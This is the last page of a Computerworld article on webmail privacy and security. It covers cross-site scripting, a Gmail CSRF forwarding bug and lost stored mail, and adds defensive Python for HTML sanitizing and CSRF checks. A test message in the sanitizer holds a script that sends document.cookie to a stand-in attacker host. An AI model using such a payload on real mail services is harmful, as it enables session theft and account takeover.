The darker side of Webmail

Web-based e-mail may be exposing you to privacy and security problems you didn't expect

Page 3 of 3

Webmail is different

However, there's no denying that Webmail, because it is a Web application, is subject to attacks from black-hat hackers looking for vulnerable targets. "It's the law of large numbers," says Ponemon. "The seriously bad criminals -- computer jocks in places like Romania and China -- they look for the big brands because that's where they'll get the most traction from their criminal activity."

The two most prevalent vulnerabilities today are cross-site scripting and cross-site request forgeries, according to Petkov. In fact, cross-site scripting is the most prominent vulnerability on the Web, notes Grossman. "It's what's used most often to break into Webmail accounts specifically."

In Webmail cross-site scripting, a cybercriminal will send an e-mail that contains some malicious HTML and JavaScript code in it. When the victim opens that Webmail message, the code automatically executes and sends their cookies, which contain the information needed to get access to that Webmail account, back to the bad guys. Once that happens, the criminals "have everything they need to log in as you," says Grossman. "There's not much you can do about it."
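The defence against the attack just described is to never let script, event-handler attributes or script-bearing links from a message body reach the reader's browser. The following allow-list sanitizer is an added example and is not code from the article or from any of the providers it discusses; it assumes only the Python standard library, and the hostile message at the bottom is constructed for the demonstration (the hostname `attacker.invalid` is a placeholder).

```python
# Added example (not from the article): a minimal allow-list HTML sanitizer of the
# kind a webmail front end must apply to every message body before rendering it,
# so that script elements and event-handler attributes embedded in a message never
# execute in the reader's browser. Standard library only.
from html import escape
from html.parser import HTMLParser

# Tags that may appear in a rendered message; any other tag is stripped but its text kept.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "u", "a",
                "ul", "ol", "li", "blockquote", "div", "span"}
# Attributes permitted per tag: no on* handlers, no style, no src, nothing unlisted.
ALLOWED_ATTRS = {"a": {"href", "title"}}
# Elements whose inner content is executable or embeds other content; dropped entirely.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")


def is_safe_url(value):
    """Accept only explicit http(s)/mailto links. Browsers ignore whitespace and
    control characters inside a scheme, so strip them before checking."""
    if value is None:
        return False
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20).lower()
    return cleaned.startswith(SAFE_URL_SCHEMES)


class MailHtmlSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skipping = 0  # > 0 while inside an element from DROP_WITH_CONTENT

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skipping += 1
            return
        if self._skipping or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag itself, keep its text content
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # covers every on* event handler, style, src, etc.
            if name == "href" and not is_safe_url(value):
                continue  # javascript:, data:, vbscript: links are dropped
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skipping = max(0, self._skipping - 1)
            return
        if not self._skipping and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skipping:
            self.out.append(escape(data))  # text is re-escaped, never passed through raw

    def handle_comment(self, data):
        pass  # comments, including IE conditional comments, are dropped


def sanitize_message_html(raw_html):
    """Return a rendering-safe version of an untrusted message body."""
    parser = MailHtmlSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out)


# Constructed sample of a hostile message body, in the style the article describes.
SAMPLE_MESSAGE = (
    '<p>Hi <b onmouseover="leak()">there</b>'
    '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>'
    '<a href="javascript:leak()">invoice</a> '
    '<a href="https://example.com/">site</a></p>'
)

if __name__ == "__main__":
    print(sanitize_message_html(SAMPLE_MESSAGE))
```

Sanitizing is the first layer; marking the session cookie `HttpOnly` so that script cannot read `document.cookie` at all, and sending a Content-Security-Policy that forbids inline script, are the second and third, and a webmail service should do all three.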

Cross-site request forgery uses cross-site scripting as its first step, says Petkov, but it goes further and uses that info to impersonate the victim to gain access to other accounts. Last fall, Petkov reported a Gmail vulnerability that could allow a hacker to use cross-site request forgery to log into your e-mail account and configure it to forward copies of all your e-mails to the attacker's address. Or they might configure it to simply send copies of all e-mails that contain words like "account number" or "password," which might deliver the information needed to sign into the victim's bank account. Most users would never even realize this was happening -- that is, until they logged into their bank account and found it had been drained.
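What makes the forwarding-filter attack possible is that the browser attaches the victim's session cookie to a settings request regardless of which site caused it. The checks below are an added example, not the article's text and not Google's code: a request that changes forwarding is refused unless it is a POST, comes from the webmail site's own origin, and carries a per-session token that a third-party page cannot know. The request and session dictionaries, `SITE_ORIGIN` and `mail.example.com` are assumptions made for the example.

```python
# Added example (not from the article, not Google's code): server-side checks a webmail
# back end applies before honouring a request that changes mail forwarding, so that a
# request forged from another site in the victim's browser is refused even though
# the browser sent the victim's session cookie with it. Standard library only.
import hashlib
import hmac
import secrets

SITE_ORIGIN = "https://mail.example.com"  # assumed origin of the webmail application


def new_session():
    """A server-side session record. The CSRF secret lives only here, never in a cookie,
    so a page on another origin has no way to read or derive the token."""
    return {
        "session_id": secrets.token_hex(16),
        "csrf_secret": secrets.token_bytes(32),
        "forwarding_address": None,
    }


def csrf_token_for(session):
    """Synchronizer token embedded in the settings form served to this session."""
    return hmac.new(session["csrf_secret"],
                    session["session_id"].encode(), hashlib.sha256).hexdigest()


def check_state_change(request, session):
    """Return (ok, reason) for a request shaped as
    {'method': str, 'headers': {name: value}, 'form': {field: value}} (assumed shape)."""
    if request["method"] != "POST":
        # A link, image or prefetch can only produce GET; never let GET change settings.
        return False, "state change must be POST"
    headers = request["headers"]
    origin = headers.get("Origin")
    referer = headers.get("Referer", "")
    # Origin must match exactly; a Referer must sit under the site's own origin.
    same_site = (origin == SITE_ORIGIN) if origin is not None \
        else referer.startswith(SITE_ORIGIN + "/")
    if not same_site:
        return False, "cross-origin request"
    token = request["form"].get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(token, csrf_token_for(session)):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def set_forwarding(request, session):
    """Apply a forwarding change only when every CSRF check passes."""
    ok, reason = check_state_change(request, session)
    if ok:
        session["forwarding_address"] = request["form"]["forward_to"]
    return ok, reason


if __name__ == "__main__":
    s = new_session()
    legit = {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
             "form": {"csrf_token": csrf_token_for(s), "forward_to": "me@example.org"}}
    forged = {"method": "POST", "headers": {"Origin": "https://attacker.invalid"},
              "form": {"forward_to": "copy@attacker.invalid"}}  # constructed forgery
    print(set_forwarding(legit, s), s["forwarding_address"])
    print(set_forwarding(forged, s), s["forwarding_address"])
```

Setting the session cookie with the `SameSite` attribute adds a browser-enforced layer on top of these server checks, and a change to a forwarding address is also worth confirming to the user by a separate notification, so that a change the user did not make is noticed rather than discovered after the fact.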

Google fixed the vulnerability (although, according to Petkov, it wasn't a complete fix and some users were compromised). And Petkov isn't singling out Google for special criticism. All Webmail vendors are engaged in a constant battle against these and other types of exploits, he says. "I'm sure Google is putting a lot of effort into securing their software, but mistakes happen," Petkov notes. "Especially on the Web, where everything is constantly changing and people are always striving to add new features. Every time they add a new feature, there could be a problem."

This is your life on a server

Finally, what can you do if you have a problem with Webmail, for example if your e-mails disappear?

That's what happened to Jeneane D. Sessum, a writer and consultant in Atlanta who uses Gmail and several other Google Web-based applications. Last November, a large chunk of the e-mail messages she had stored on Google's server simply disappeared. When she tried to contact Google support, she was directed to its online help forums. She couldn't find an answer there. Then she filled out a contact form to report a technical problem. In reply, she received a form e-mail saying that Google had determined that there was no outage or data problem that would have caused her e-mail to vanish. "That was it," says Sessum. "No advice on what to do." She had to work through her own personal network to reach an actual person at Google, someone in technical support. "But still nobody could tell me anything except that nothing was wrong on their end."

Sessum wishes Google could be more responsive, especially to users like her who are basing their small businesses on its platforms. "I don't buy this line that these are free services and so you get what you pay for," she says. "They make money off of me by serving ads up every time I send an e-mail." She says she'd gladly pay Google some type of premium fee that would get her better support and perhaps guaranteed backups of her e-mail.

Google's Grant won't discuss individual problems like Sessum's, citing user privacy. Google can sometimes restore deleted e-mail, she says, depending on how much time has passed. Ultimately, Google permanently deletes it, but she won't specify the amount of time that Google waits before doing that. "We must strike this balance between, on the one hand, keeping that e-mail around just in case of situations like this so that we could recover the e-mail for the user and, on the other hand, doing what the user has told us to do when they tell us to delete the e-mail," she says.

Tellingly, Sessum still uses Gmail and her other Google apps. Indeed, most users seem willing to accept the trade-offs in exchange for the features, usability and accessibility of these services.

Sessum, for example, admits that she should have been more conscientious about keeping her own backup of her Gmails. Ironically, she's configured her Gmail account to forward a copy of everything to her Yahoo Mail. "So my backup to my Web-based e-mail is another Web-based e-mail account," she admits.

Tam Harbert is a Washington-based freelance journalist. Her last piece for Computerworld was Confessions of a Cobol programmer.

Copyright © 2008 IDG Communications, Inc.
